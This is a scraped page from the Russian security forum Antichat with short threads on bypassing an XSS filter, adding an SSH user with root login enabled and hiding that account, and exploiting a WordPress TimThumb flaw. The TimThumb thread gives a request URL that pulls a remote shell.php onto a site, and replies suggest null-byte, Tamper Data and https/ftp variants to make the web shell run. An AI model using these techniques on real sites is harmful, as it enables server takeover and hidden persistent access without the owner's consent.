ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "

Как создать учетную запись в ssh срочно !

sudo useradd noob

sudo passwd noob

***** (тут пасс)

куда это прописывать ?

что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

/etc/ssh/sshd_config

PermitRootLogin no -> PermitRootLogin yes

А как спрятать учетку ?

спрятать от кого или от чего?

в /etc/passwd все равно палится учетка

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть

а ты пробовал blabla.php%00.jpg , или через temper data?

или так же заместо http://yousite.com/shell.php

так https://yousite.com/shell.php,ftp://yousite.com/shell.php?